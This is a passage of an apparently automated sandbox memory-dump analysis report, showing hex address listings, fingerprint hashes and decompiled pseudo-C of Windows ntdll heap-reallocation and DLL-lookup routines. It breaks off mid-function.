                                                        0x00bed21b
                                                        0x00bed21f
                                                        0x00bed220
                                                        0x00bed223
                                                        0x00bed224
                                                        0x00bed22f
                                                        0x00bed234
                                                        0x00bed239
                                                        0x00bed244
                                                        0x00bed244
                                                        0x00000000
                                                        0x00bed239
                                                        0x00bed08e
                                                        0x00bed08f
                                                        0x00bed1c5
                                                        0x00bed1ca
                                                        0x00bed1cc
                                                        0x00bed1cc
                                                        0x00bed1d1
                                                        0x00bed1d3
                                                        0x00bed1d7
                                                        0x00bed1db
                                                        0x00bed1df
                                                        0x00bed1e0
                                                        0x00bed1e3
                                                        0x00bed1e4
                                                        0x00bed1ef
                                                        0x00bed1f4
                                                        0x00bed1f9
                                                        0x00bed204
                                                        0x00bed204
                                                        0x00000000
                                                        0x00bed1f9
                                                        0x00bed095
                                                        0x00bed096
                                                        0x00bed17b
                                                        0x00bed182
                                                        0x00bed184
                                                        0x00bed184
                                                        0x00bed189
                                                        0x00bed18e
                                                        0x00bed193
                                                        0x00bed195
                                                        0x00bed197
                                                        0x00bed198
                                                        0x00bed199
                                                        0x00bed19c
                                                        0x00bed19f
                                                        0x00bed1a0
                                                        0x00bed1ab
                                                        0x00bed1b0
                                                        0x00bed1b5
                                                        0x00bed1bc
                                                        0x00bed1be
                                                        0x00bed1be
                                                        0x00bed154
                                                        0x00bed154
                                                        0x00000000
                                                        0x00bed154
                                                        0x00bed09d
                                                        0x00bed273
                                                        0x00bed274
                                                        0x00bed27e
                                                        0x00000000
                                                        0x00bed283
                                                        0x00bed0a5
                                                        0x00000000
                                                        0x00bed0ab
                                                        0x00bed0ae
                                                        0x00bed0b0
                                                        0x00bed0bb
                                                        0x00bed0cf
                                                        0x00bed0e2
                                                        0x00bed0ed
                                                        0x00bed101
                                                        0x00bed103
                                                        0x00bed119
                                                        0x00bed12c
                                                        0x00bed14e
                                                        0x00bed151
                                                        0x00000000
                                                        0x00bed151
                                                        0x00bed0a5
                                                        0x00bed16d
                                                        0x00000000
                                                        0x00000000
                                                        0x00bed173
                                                        0x00000000
                                                        0x00bed173
                                                        0x00bed04b
                                                        0x00bed299
                                                        0x00000000
                                                        0x00bed2a0
                                                        0x00bed2a0
                                                        0x00000000
                                                        0x00bed2a0

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: None%s$%08I64X: PC32 %08X -> %08X (target %p) %s$%08I64X: Unknown$%08I64X: VA32 %08X -> %08X %s$%08I64X: VA64 %016I64X -> %016I64X %s$ (padding)$(no change)$Invalid fixup information$`%V
                                                        • API String ID: 0-1337375492
                                                        • Opcode ID: b1e60289ae52c799dd19378d7d08d75855dec843628ef6a2b78081847c8968b7
                                                        • Instruction ID: 92b65b60681a6e9b29d155269d1c2dbe469d127a7471684bc136c2ee3d46ce6f
                                                        • Opcode Fuzzy Hash: b1e60289ae52c799dd19378d7d08d75855dec843628ef6a2b78081847c8968b7
                                                        • Instruction Fuzzy Hash: 0191E3B2E00615ABDB188F49CC91A6973E5EB88710F19C1BDEA19AB381D6B0DD41C791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00BF1238, Relevance: 10.3, Strings: 8, Instructions: 324COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 65%
                                                        			E00BF1238(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t123;
				signed int _t124;
				void* _t130;
				intOrPtr _t132;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				intOrPtr _t151;
				intOrPtr _t163;
				signed int _t173;
				signed int _t174;
				signed int _t178;
				short _t184;
				signed int _t193;
				signed int _t194;
				intOrPtr _t197;
				intOrPtr _t219;
				short* _t233;
				void* _t246;
				intOrPtr _t248;
				signed int _t251;
				signed int _t253;
				signed int _t254;
				void* _t255;
				void* _t256;

				_t246 = __edx;
				_push(0x18);
				_push(0xb4d158);
				_t123 = E00B4DF5C(__ebx, __edi, __esi);
				_t248 =  *((intOrPtr*)(_t255 + 8));
				 *((intOrPtr*)(_t255 + 8)) = _t248;
				 *((char*)(_t255 - 0x19)) = 0;
				 *(_t255 - 0x24) = 0;
				if(( *(_t248 + 0x44) & 0x01000000) == 0) {
					 *(_t255 - 4) = 0;
					 *(_t255 - 4) = 1;
					_t232 = "RtlReAllocateHeap";
					_t124 = E00B585CA(_t248, "RtlReAllocateHeap");
					__eflags = _t124;
					if(_t124 != 0) {
						 *(_t255 + 0xc) =  *(_t255 + 0xc) |  *(_t248 + 0x44) | 0x10000100;
						_t251 =  *(_t255 + 0x14);
						__eflags = _t251;
						if(_t251 == 0) {
							_t235 = 1;
							__eflags = 1;
						} else {
							_t235 = _t251;
						}
						_t130 = ( *((intOrPtr*)(_t248 + 0x98)) + _t235 &  *(_t248 + 0x9c)) + 8;
						__eflags = _t130 - _t251;
						if(_t130 < _t251) {
							L66:
							_t132 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t132 + 0xc);
							if( *(_t132 + 0xc) == 0) {
								_push("HEAP: ");
								E00B9373B();
							} else {
								E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push( *((intOrPtr*)(_t248 + 0x7c)));
							E00B9373B("Invalid allocation size - %x (exceeded %x)\n", _t251);
							E00BF06F9(0);
							_t117 = _t255 - 0x24;
							 *_t117 =  *(_t255 - 0x24) & 0x00000000;
							__eflags =  *_t117;
							goto L71;
						} else {
							__eflags = _t130 -  *((intOrPtr*)(_t248 + 0x7c));
							if(_t130 >  *((intOrPtr*)(_t248 + 0x7c))) {
								goto L66;
							}
							__eflags =  *(_t255 + 0xc) & 0x00000001;
							if(__eflags == 0) {
								E00B422D0(__eflags,  *((intOrPtr*)(_t248 + 0xcc)));
								 *((char*)(_t255 - 0x19)) = 1;
								_t26 = _t255 + 0xc;
								 *_t26 =  *(_t255 + 0xc) | 0x00000001;
								__eflags =  *_t26;
							}
							E00BF098E(_t235, _t246, _t248, 0);
							_t253 =  *((intOrPtr*)(_t255 + 0x10)) + 0xfffffff8;
							__eflags =  *((char*)(_t253 + 7)) - 5;
							if( *((char*)(_t253 + 7)) == 5) {
								_t253 = _t253 - (( *(_t253 + 6) & 0x000000ff) << 3);
								__eflags = _t253;
							}
							_t145 = E00B80ED7(_t235, _t248, _t253, _t232);
							__eflags = _t145;
							if(_t145 == 0) {
								L52:
								_t146 =  *(_t255 - 0x24);
								__eflags = _t146;
								if(_t146 == 0) {
									L71:
									_t119 = _t255 - 4;
									 *_t119 =  *(_t255 - 4) & 0x00000000;
									__eflags =  *_t119;
									 *(_t255 - 4) = 0xfffffffe;
									E00BF16C3();
									_t123 =  *(_t255 - 0x24);
									goto L72;
								}
								__eflags = _t146 -  *0xc27928; // 0x0
								if(__eflags != 0) {
									_t147 = E00B58131();
									__eflags = _t147 & 0x00000800;
									if((_t147 & 0x00000800) == 0) {
										goto L71;
									}
									__eflags =  *(_t255 - 0x20) -  *0xc2792c; // 0x0
									if(__eflags != 0) {
										goto L71;
									}
									__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0xc2792e; // 0x0
									if(__eflags != 0) {
										goto L71;
									}
									_t151 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *(_t151 + 0xc);
									if( *(_t151 + 0xc) == 0) {
										_push("HEAP: ");
										E00B9373B();
									} else {
										E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
									}
									_push(E00BDF719(_t248,  *(_t255 - 0x20)));
									_push( *(_t255 + 0x14));
									E00B9373B("Just reallocated block at %p to 0x%x bytes with tag %ws\n",  *(_t255 - 0x24));
									L58:
									E00BF06F9(0);
									goto L71;
								}
								_t163 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t163 + 0xc);
								if( *(_t163 + 0xc) == 0) {
									_push("HEAP: ");
									E00B9373B();
								} else {
									E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t255 + 0x14));
								E00B9373B("Just reallocated block at %p to %x bytes\n",  *0xc27928);
								goto L58;
							} else {
								__eflags =  *((intOrPtr*)(_t255 + 0x10)) -  *0xc27928; // 0x0
								if(__eflags != 0) {
									_t173 = E00B58131();
									__eflags = _t173 & 0x00000800;
									if((_t173 & 0x00000800) == 0) {
										L37:
										_t174 = E00B5C7BC(_t248,  *(_t255 + 0xc),  *((intOrPtr*)(_t255 + 0x10)),  *(_t255 + 0x14));
										 *(_t255 - 0x24) = _t174;
										__eflags = _t174;
										if(_t174 != 0) {
											_t70 = _t174 - 8; // -8
											_t254 = _t70;
											__eflags =  *((char*)(_t254 + 7)) - 5;
											if( *((char*)(_t254 + 7)) == 5) {
												_t254 = _t254 - (( *(_t254 + 6) & 0x000000ff) << 3);
												__eflags = _t254;
											}
											__eflags =  *(_t248 + 0x4c);
											if( *(_t248 + 0x4c) != 0) {
												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
												__eflags =  *(_t254 + 3) - ( *(_t254 + 2) ^  *(_t254 + 1) ^  *_t254);
												if(__eflags != 0) {
													_push(0);
													_push(_t254);
													_push(_t248);
													E00BEF8EE(_t232, _t248, _t254, __eflags);
												}
											}
											__eflags =  *(_t254 + 2) & 0x00000002;
											if(( *(_t254 + 2) & 0x00000002) == 0) {
												_t178 =  *(_t254 + 3) & 0xff;
											} else {
												_t233 = E00B72568(_t254);
												__eflags =  *(_t248 + 0x40) & 0x08000000;
												if(( *(_t248 + 0x40) & 0x08000000) == 0) {
													_t184 = 0;
													__eflags = 0;
												} else {
													_t184 = E00BE9AF6();
												}
												 *_t233 = _t184;
												_t178 =  *(_t233 + 2) & 0x0000ffff;
											}
											 *(_t255 - 0x20) = _t178;
											__eflags =  *(_t248 + 0x4c);
											if( *(_t248 + 0x4c) != 0) {
												_t235 =  *(_t254 + 2) & 0x000000ff;
												 *(_t254 + 3) =  *(_t254 + 1) & 0x000000ff ^  *_t254 & 0x000000ff ^  *(_t254 + 2) & 0x000000ff;
												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
												__eflags =  *_t254;
											}
										}
										E00BEFB7A(_t235, _t246, _t248, 1);
										E00BF098E(_t235, _t246, _t248, 0);
										goto L52;
									}
									_t232 = 0;
									__eflags =  *0xc2792c - _t232; // 0x0
									if(__eflags == 0) {
										goto L37;
									}
									__eflags =  *(_t248 + 0x4c);
									if( *(_t248 + 0x4c) != 0) {
										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
										__eflags =  *(_t253 + 3) - ( *(_t253 + 2) ^  *(_t253 + 1) ^  *_t253);
										if(__eflags != 0) {
											_push(0);
											_push(_t253);
											_push(_t248);
											E00BEF8EE(0, _t248, _t253, __eflags);
										}
									}
									__eflags =  *(_t253 + 2) & 0x00000002;
									if(( *(_t253 + 2) & 0x00000002) == 0) {
										_t193 =  *(_t253 + 3) & 0xff;
									} else {
										_t193 =  *(E00B72568(_t253) + 2) & 0x0000ffff;
									}
									 *(_t255 - 0x20) = _t193;
									__eflags =  *(_t248 + 0x4c) - _t232;
									if( *(_t248 + 0x4c) != _t232) {
										_t235 =  *(_t253 + 2) & 0x000000ff;
										 *(_t253 + 3) =  *(_t253 + 1) & 0x000000ff ^  *_t253 & 0x000000ff ^  *(_t253 + 2) & 0x000000ff;
										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
										__eflags =  *_t253;
									}
									_t194 =  *(_t255 - 0x20);
									__eflags = _t194 - _t232;
									if(_t194 != _t232) {
										__eflags = _t194 -  *0xc2792c; // 0x0
										if(__eflags != 0) {
											goto L37;
										}
										__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0xc2792e; // 0x0
										if(__eflags != 0) {
											goto L37;
										}
										_t197 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
										__eflags =  *((intOrPtr*)(_t197 + 0xc)) - _t232;
										if( *((intOrPtr*)(_t197 + 0xc)) == _t232) {
											_push("HEAP: ");
											E00B9373B();
										} else {
											E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
										}
										_pop(_t235);
										_push(E00BDF719(_t248,  *(_t255 - 0x20)));
										_push( *(_t255 + 0x14));
										E00B9373B("About to rellocate block at %p to 0x%x bytes with tag %ws\n",  *((intOrPtr*)(_t255 + 0x10)));
										_t256 = _t256 + 0x10;
										_push(_t232);
										L36:
										E00BF06F9();
									}
									goto L37;
								}
								_t219 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t219 + 0xc);
								if( *(_t219 + 0xc) == 0) {
									_push("HEAP: ");
									E00B9373B();
								} else {
									E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_pop(_t235);
								_push( *(_t255 + 0x14));
								E00B9373B("About to reallocate block at %p to %x bytes\n",  *0xc27928);
								_t256 = _t256 + 0xc;
								_push(0);
								goto L36;
							}
						}
					}
					 *(_t255 - 0x24) = 0;
					goto L71;
				} else {
					_push( *(_t255 + 0x14));
					_push( *((intOrPtr*)(_t255 + 0x10)));
					_push( *(_t255 + 0xc));
					_push(_t248);
					E00BEE765();
					L72:
					return E00B4DFA1(_t123);
				}
			}




























                                                        0x00bf1238
                                                        0x00bf1238
                                                        0x00bf123a
                                                        0x00bf123f
                                                        0x00bf1244
                                                        0x00bf1247
                                                        0x00bf124a
                                                        0x00bf1250
                                                        0x00bf125a
                                                        0x00bf1270
                                                        0x00bf1273
                                                        0x00bf127a
                                                        0x00bf1281
                                                        0x00bf1286
                                                        0x00bf1288
                                                        0x00bf129a
                                                        0x00bf129d
                                                        0x00bf12a0
                                                        0x00bf12a2
                                                        0x00bf12aa
                                                        0x00bf12aa
                                                        0x00bf12a4
                                                        0x00bf12a4
                                                        0x00bf12a4
                                                        0x00bf12b9
                                                        0x00bf12bc
                                                        0x00bf12be
                                                        0x00bf1616
                                                        0x00bf161c
                                                        0x00bf161f
                                                        0x00bf1623
                                                        0x00bf1645
                                                        0x00bf164a
                                                        0x00bf1625
                                                        0x00bf163d
                                                        0x00bf1642
                                                        0x00bf1650
                                                        0x00bf1659
                                                        0x00bf1663
                                                        0x00bf169f
                                                        0x00bf169f
                                                        0x00bf169f
                                                        0x00000000
                                                        0x00bf12c4
                                                        0x00bf12c4
                                                        0x00bf12c7
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf12cd
                                                        0x00bf12d1
                                                        0x00bf12d9
                                                        0x00bf12de
                                                        0x00bf12e2
                                                        0x00bf12e2
                                                        0x00bf12e2
                                                        0x00bf12e2
                                                        0x00bf12e9
                                                        0x00bf12f1
                                                        0x00bf12f4
                                                        0x00bf12f8
                                                        0x00bf1301
                                                        0x00bf1301
                                                        0x00bf1301
                                                        0x00bf1306
                                                        0x00bf130b
                                                        0x00bf130d
                                                        0x00bf1516
                                                        0x00bf1516
                                                        0x00bf1519
                                                        0x00bf151b
                                                        0x00bf16a3
                                                        0x00bf16a3
                                                        0x00bf16a3
                                                        0x00bf16a3
                                                        0x00bf16a7
                                                        0x00bf16ae
                                                        0x00bf16b3
                                                        0x00000000
                                                        0x00bf16b3
                                                        0x00bf1521
                                                        0x00bf1527
                                                        0x00bf1585
                                                        0x00bf158a
                                                        0x00bf158f
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf1599
                                                        0x00bf15a0
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf15ad
                                                        0x00bf15b4
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf15c0
                                                        0x00bf15c3
                                                        0x00bf15c7
                                                        0x00bf15e9
                                                        0x00bf15ee
                                                        0x00bf15c9
                                                        0x00bf15e1
                                                        0x00bf15e6
                                                        0x00bf15fd
                                                        0x00bf15fe
                                                        0x00bf1609
                                                        0x00bf1579
                                                        0x00bf157b
                                                        0x00000000
                                                        0x00bf157b
                                                        0x00bf152f
                                                        0x00bf1532
                                                        0x00bf1536
                                                        0x00bf1558
                                                        0x00bf155d
                                                        0x00bf1538
                                                        0x00bf1550
                                                        0x00bf1555
                                                        0x00bf1563
                                                        0x00bf1571
                                                        0x00000000
                                                        0x00bf1313
                                                        0x00bf1316
                                                        0x00bf131c
                                                        0x00bf1375
                                                        0x00bf137a
                                                        0x00bf137f
                                                        0x00bf1468
                                                        0x00bf1472
                                                        0x00bf1477
                                                        0x00bf147a
                                                        0x00bf147c
                                                        0x00bf1482
                                                        0x00bf1482
                                                        0x00bf1485
                                                        0x00bf1489
                                                        0x00bf1492
                                                        0x00bf1492
                                                        0x00bf1492
                                                        0x00bf1494
                                                        0x00bf1498
                                                        0x00bf149d
                                                        0x00bf14a7
                                                        0x00bf14aa
                                                        0x00bf14ac
                                                        0x00bf14ae
                                                        0x00bf14af
                                                        0x00bf14b0
                                                        0x00bf14b0
                                                        0x00bf14aa
                                                        0x00bf14b5
                                                        0x00bf14b9
                                                        0x00bf14e3
                                                        0x00bf14bb
                                                        0x00bf14c1
                                                        0x00bf14c3
                                                        0x00bf14ca
                                                        0x00bf14d3
                                                        0x00bf14d3
                                                        0x00bf14cc
                                                        0x00bf14cc
                                                        0x00bf14cc
                                                        0x00bf14d5
                                                        0x00bf14d8
                                                        0x00bf14d8
                                                        0x00bf14e6
                                                        0x00bf14e9
                                                        0x00bf14ed
                                                        0x00bf14f8
                                                        0x00bf14fe
                                                        0x00bf1504
                                                        0x00bf1504
                                                        0x00bf1504
                                                        0x00bf14ed
                                                        0x00bf1509
                                                        0x00bf1511
                                                        0x00000000
                                                        0x00bf1511
                                                        0x00bf1385
                                                        0x00bf1387
                                                        0x00bf138d
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf1393
                                                        0x00bf1396
                                                        0x00bf139b
                                                        0x00bf13a5
                                                        0x00bf13a8
                                                        0x00bf13aa
                                                        0x00bf13ab
                                                        0x00bf13ac
                                                        0x00bf13ad
                                                        0x00bf13ad
                                                        0x00bf13a8
                                                        0x00bf13b2
                                                        0x00bf13b6
                                                        0x00bf13c9
                                                        0x00bf13b8
                                                        0x00bf13be
                                                        0x00bf13be
                                                        0x00bf13cc
                                                        0x00bf13cf
                                                        0x00bf13d2
                                                        0x00bf13dd
                                                        0x00bf13e3
                                                        0x00bf13e9
                                                        0x00bf13e9
                                                        0x00bf13e9
                                                        0x00bf13eb
                                                        0x00bf13ee
                                                        0x00bf13f1
                                                        0x00bf13f3
                                                        0x00bf13fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf1403
                                                        0x00bf140a
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf1412
                                                        0x00bf1415
                                                        0x00bf1418
                                                        0x00bf143a
                                                        0x00bf143f
                                                        0x00bf141a
                                                        0x00bf1432
                                                        0x00bf1437
                                                        0x00bf1444
                                                        0x00bf144e
                                                        0x00bf144f
                                                        0x00bf145a
                                                        0x00bf145f
                                                        0x00bf1462
                                                        0x00bf1463
                                                        0x00bf1463
                                                        0x00bf1463
                                                        0x00000000
                                                        0x00bf13f1
                                                        0x00bf1324
                                                        0x00bf1327
                                                        0x00bf132b
                                                        0x00bf134d
                                                        0x00bf1352
                                                        0x00bf132d
                                                        0x00bf1345
                                                        0x00bf134a
                                                        0x00bf1357
                                                        0x00bf1358
                                                        0x00bf1366
                                                        0x00bf136b
                                                        0x00bf136e
                                                        0x00000000
                                                        0x00bf136e
                                                        0x00bf130d
                                                        0x00bf12be
                                                        0x00bf128a
                                                        0x00000000
                                                        0x00bf125c
                                                        0x00bf125c
                                                        0x00bf125f
                                                        0x00bf1262
                                                        0x00bf1265
                                                        0x00bf1266
                                                        0x00bf16b6
                                                        0x00bf16bb
                                                        0x00bf16bb

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: About to reallocate block at %p to %x bytes$About to rellocate block at %p to 0x%x bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %x (exceeded %x)$Just reallocated block at %p to %x bytes$Just reallocated block at %p to 0x%x bytes with tag %ws$RtlReAllocateHeap
                                                        • API String ID: 0-3744532478
                                                        • Opcode ID: da08617383c908222452c7ca18d6a226a7fcdaed22f227f29d5b5bcbb64f8c43
                                                        • Instruction ID: bbedffa9c821709de44414988a056c662da075e901c6d1adde5dd1f3a25a381b
                                                        • Opcode Fuzzy Hash: da08617383c908222452c7ca18d6a226a7fcdaed22f227f29d5b5bcbb64f8c43
                                                        • Instruction Fuzzy Hash: E3C1A171510249EFDB21EF68C885FB9B7E0EF08710F0488D8F99597692C724ED49EB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B5E6C1, Relevance: 9.4, Strings: 7, Instructions: 626COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 86%
                                                        			E00B5E6C1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t254;
				signed int _t257;
				signed int _t258;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t288;
				signed int _t290;
				signed int _t299;
				intOrPtr _t300;
				intOrPtr _t303;
				intOrPtr _t304;
				intOrPtr* _t319;
				intOrPtr* _t320;
				intOrPtr* _t321;
				intOrPtr _t324;
				signed int _t328;
				intOrPtr _t331;
				intOrPtr* _t332;
				signed short _t333;
				signed int _t336;
				intOrPtr _t347;
				signed int _t348;
				intOrPtr _t355;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed short* _t388;
				signed short* _t390;
				signed int _t391;
				signed int _t401;
				intOrPtr _t403;
				intOrPtr* _t405;
				signed int _t406;
				intOrPtr _t407;
				signed int _t410;
				signed int _t411;
				intOrPtr* _t414;
				intOrPtr* _t416;
				signed int _t417;
				intOrPtr* _t418;
				void* _t419;
				void* _t421;
				void* _t422;

				_push(0xb4);
				_push(0xb4be58);
				E00B4DF5C(__ebx, __edi, __esi);
				_t254 =  *0xb4f78c; // 0x8
				_t416 =  *((intOrPtr*)(_t421 + 0xc));
				if(( *0xc277a0 & (_t254 | 0x00000001)) != 0) {
					_push(_t416);
					E00BBF970(__ebx, "d:\\w7rtm\\minkernel\\ntdll\\ldrfind.c", 0xe7, "LdrpFindOrMapDll", 3, "DLL name: %wZ DLL path: %wZ\n",  *(_t421 + 8));
					_t422 = _t422 + 0x1c;
				}
				_t257 =  *0xc277a0; // 0x0
				if(( *0xb4f790 & _t257) != 0) {
					asm("int3");
				}
				_t410 = 0;
				 *(_t421 - 0x24) = 0;
				 *((intOrPtr*)(_t421 - 0x5c)) = 0;
				 *((intOrPtr*)(_t421 - 0x4c)) = 0;
				 *(_t421 - 0x28) = 0;
				 *(_t421 + 0xf) = 0;
				_t401 = 0;
				if( *(_t421 + 0x18) != 0) {
					_t258 = E00B4FA50(0,  *(_t421 + 8),  *((intOrPtr*)(_t421 + 0x1c)));
					__eflags = _t258;
					if(_t258 != 0) {
						goto L13;
					}
					_t411 = E00B61A18(_t406,  *(_t421 + 8), _t421 - 0x3c);
					__eflags = _t411;
					if(_t411 < 0) {
						goto L14;
					}
					_t411 = E00B61AC6(_t402,  *(_t421 + 8), _t421 - 0x48, _t421 - 0x34);
					__eflags = _t411;
					if(_t411 < 0) {
						E00B4E1C6(_t421 - 0x3c);
						goto L14;
					}
					 *(_t421 - 0x24) = 0x10000000;
					goto L84;
				} else {
					_t388 =  *(_t421 + 8);
					_t402 = _t388[2];
					_t390 = ( *_t388 & 0x0000ffff) + _t402 - 2;
					while(_t390 >= _t402) {
						_t406 =  *_t390 & 0x0000ffff;
						if(_t406 == 0x5c || _t406 == 0x2f) {
							 *(_t421 + 0xf) = 1;
							break;
						} else {
							_t390 = _t390;
							continue;
						}
					}
					__eflags =  *(_t421 + 0xf);
					if( *(_t421 + 0xf) == 0) {
						_t391 = E00B4FA50( *(_t421 + 8), _t410,  *((intOrPtr*)(_t421 + 0x1c)));
						__eflags = _t391;
						if(_t391 != 0) {
							L13:
							 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
							_t411 = 0;
							__eflags = 0;
							L14:
							_t260 =  *0xb4f798; // 0x8
							_t261 = _t260 | 0x00000001;
							__eflags =  *0xc277a0 & _t261;
							if(( *0xc277a0 & _t261) != 0) {
								E00BBF970(_t401, "d:\\w7rtm\\minkernel\\ntdll\\ldrfind.c", 0x2d9, "LdrpFindOrMapDll", 4, "Status: 0x%08lx\n", _t411);
							}
							_t263 =  *0xc277a0; // 0x0
							__eflags =  *0xb4f79c & _t263;
							if(( *0xb4f79c & _t263) != 0) {
								asm("int3");
							}
							return E00B4DFA1(_t411);
						}
						_t411 = E00B5FBDF(_t410,  *(_t421 + 8), 0xf, _t421 - 0x48, _t421 - 0x34, _t421 - 0x2c);
						__eflags = _t411;
						if(_t411 < 0) {
							__eflags = _t411 - 0xc0000135;
							if(_t411 == 0xc0000135) {
								_t410 = 0;
								goto L10;
							}
							goto L14;
						}
						L19:
						_t290 = E00B4E893(_t421 - 0x48, 0xb5ed64, 1);
						__eflags = _t290;
						 *((char*)(_t421 + 0x10)) = _t290 & 0xffffff00 | _t290 != 0x00000000;
						_t411 = E00B5BC87(_t406, _t416,  *((intOrPtr*)(_t421 - 0x2c)),  *((intOrPtr*)(_t421 - 0x44)),  *((intOrPtr*)(_t421 - 0x30)),  *((intOrPtr*)(_t421 + 0x10)), _t421 - 0x1c, _t421 - 0x54);
						_t401 = 0;
						__eflags = _t411;
						if(__eflags < 0) {
							L29:
							E00B3F9F0( *((intOrPtr*)(_t421 - 0x2c)));
							__eflags =  *(_t421 - 0x28) - _t401;
							if( *(_t421 - 0x28) == _t401) {
								L32:
								E00B4E025(_t402,  *0xc20104, 0,  *((intOrPtr*)(_t421 - 0x30)));
								goto L14;
							}
							L30:
							E00B3F9F0( *(_t421 - 0x28));
							L31:
							E00B4E1C6(_t421 - 0x3c);
							goto L32;
						}
						 *(_t421 + 0x18) = _t411;
						_push(_t421 - 0x20);
						_push(0);
						_push( *((intOrPtr*)(_t421 - 0x54)));
						_push( *((intOrPtr*)(_t421 - 0x1c)));
						_push(0);
						_t411 = E00B4F535(_t411, _t416, __eflags);
						__eflags = _t411;
						if(_t411 < 0) {
							L28:
							_push( *((intOrPtr*)(_t421 - 0x1c)));
							E00B3FC90(0xffffffff);
							goto L29;
						}
						__eflags =  *(_t421 + 0xf);
						if( *(_t421 + 0xf) != 0) {
							_t299 = E00B61603( *((intOrPtr*)(_t421 - 0x1c)),  *((intOrPtr*)(_t421 - 0x20)),  *((intOrPtr*)(_t421 + 0x1c)));
							__eflags = _t299;
							if(_t299 == 0) {
								goto L22;
							}
							 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
							_t411 = 0;
							goto L28;
						}
						L22:
						__eflags =  *0xc200d8 - 0x2000;
						if( *0xc200d8 == 0x2000) {
							_t402 = 0x10b;
							_t300 =  *((intOrPtr*)(_t421 - 0x20));
							__eflags =  *((intOrPtr*)(_t300 + 0x18)) - 0x10b;
							if( *((intOrPtr*)(_t300 + 0x18)) != 0x10b) {
								goto L23;
							}
							__eflags =  *((intOrPtr*)(_t300 + 0x38)) - 0x1000;
							if( *((intOrPtr*)(_t300 + 0x38)) != 0x1000) {
								goto L23;
							}
							_push(_t401);
							_push(0x30);
							_push(_t421 - 0xc4);
							_push(1);
							E00B40060( *((intOrPtr*)(_t421 - 0x2c)));
							__eflags =  *(_t421 - 0xa1) & 0x00000008;
							if(__eflags == 0) {
								goto L23;
							}
							 *(_t421 - 4) = _t401;
							_t411 = E00BC5F1D(0x10b, _t406, __eflags, _t421 - 0x34,  *((intOrPtr*)(_t421 - 0x20)),  *((intOrPtr*)(_t421 - 0x1c)));
							 *(_t421 - 0x70) = _t411;
							 *(_t421 - 4) = 0xfffffffe;
							__eflags = _t411 - _t401;
							if(_t411 >= _t401) {
